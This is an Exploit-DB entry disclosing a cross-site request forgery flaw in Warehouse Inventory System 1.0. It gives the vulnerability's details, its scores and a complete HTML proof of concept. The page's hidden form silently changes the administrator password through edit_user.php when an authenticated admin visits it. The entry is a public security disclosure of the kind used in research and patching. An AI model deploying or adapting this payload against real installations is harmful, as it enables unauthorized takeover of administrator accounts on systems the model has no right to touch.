Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-09 # Vendor Homepage: https://oswapp.com # Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6 # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's # Warehouuse Inventory System v1.0 allows remote attackers to change the admins password # via authenticated admin visiting a third-party site. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST"> <input type="hidden" name="password" value="Boku123!" /> <input type="hidden" name="update-pass" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>